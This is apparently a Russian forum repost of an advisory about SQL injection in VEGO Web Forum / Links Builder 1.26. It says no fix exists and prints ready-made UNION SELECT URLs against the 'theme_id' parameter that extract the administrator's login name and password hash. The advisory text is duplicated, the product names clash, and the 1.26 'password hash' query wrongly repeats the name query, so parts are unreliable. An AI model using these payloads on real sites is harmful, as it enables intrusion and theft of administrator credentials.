SQL-инъекция в VEGO Web Forum
Программа:VEGO Links Builder 1.26
Описание:Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "theme_id". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
Решение: Способов устранения уязвимости на данный момент не существует.
:zns2: Производитель
Источник(1):www.securitylab.ru
Источник(2):evuln.com
Программа:VEGO Links Builder 1.26
Описание:Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "theme_id". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
Код:
Administrator's login name.
For version 1.26:
[url=http://hostname/webforum/index.php]http://hostname/webforum/index.php[/url]? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Earlier versions:
[url=http://hostname/temp/_1/webforum/index.php]http://hostname/temp/_1/webforum/index.php[/url]? theme_id=-1% 20union%20select% 201,2,name, 4%20from%20vwf_users% 20where%20userid=1/*
Код:
Hash of administrator's password.
For version 1.26:
[url=http://hostname/webforum/index.php]http://hostname/webforum/index.php[/url]? theme_id=-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/*
Earlier versions:
[url=http://hostname/temp/_1/webforum/index.php]http://hostname/temp/_1/webforum/index.php[/url]? theme_id=-1% 20union%20select% 201,2,pass, 4%20from%20vwf_users% 20where%20userid=1/*Решение: Способов устранения уязвимости на данный момент не существует.
:zns2: Производитель
Источник(1):www.securitylab.ru
Источник(2):evuln.com